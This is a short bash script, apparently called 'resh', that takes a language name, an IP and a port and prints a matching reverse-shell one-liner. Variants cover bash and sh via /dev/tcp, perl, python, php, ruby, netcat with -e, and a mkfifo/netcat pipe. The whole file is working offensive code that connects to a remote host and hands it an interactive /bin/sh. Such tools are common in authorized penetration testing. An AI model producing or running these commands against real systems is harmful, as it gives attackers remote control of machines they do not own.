#!/bin/bash

case $1 in

  bash)
    echo -e "bash -i >& /dev/tcp/"$2"/"$3" 0>&1"
    ;;

  sh)
    echo -e "sh -i >& /dev/tcp/"$2"/"$3" 0>&1"
    ;;

  perl)
    echo -e "perl -e \x27use Socket;\$i=\x22"$2"\x22;\$p="$3";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\x22tcp\x22));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\x22>&S\x22);open(STDOUT,\x22>&S\x22);open(STDERR,\x22>&S\x22);exec(\x22/bin/sh -i\x22);};\x27"
    ;;

  py)
    echo -e "python -c \x27import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\x22"$2"\x22,"$3"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\x22/bin/sh\x22,\x22-i\x22]);\x27"
    ;;

  php)
    echo -e "php -r \x27\$sock=fsockopen(\x22"$2"\x22,"$3");exec(\x22/bin/sh -i <&3 >&3 2>&3\x22);\x27"
    ;;

  ruby)
    echo -e "ruby -rsocket -e\x27f=TCPSocket.open(\x22"$2"\x22,"$3").to_i;exec sprintf(\x22/bin/sh -i <&%d >&%d 2>&%d\x22,f,f,f)\x27"
    ;;

  nc)
    echo -e "nc -e /bin/sh " $2 " "$3
    ;;

  nc2)
    echo -e "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "$2" "$3 " >/tmp/f"
    ;;

  *)
    echo ""
    tput bold
    echo "  Usage"
    tput sgr0
    echo "  $ resh <kind> <ip> <port>"
    echo ""
    tput bold
    echo "  Example"
    tput sgr0
    echo "  $ resh sh 192.168.0.1 9001"
    echo ""
    tput bold
    echo "  Kinds"
    tput sgr0
    echo "  - sh"
    echo "  - bash"
    echo "  - perl"
    echo "  - py"
    echo "  - php"
    echo "  - ruby"
    echo "  - nc"
    echo "  - nc2 (for nc versions without -e)"
    ;;

esac
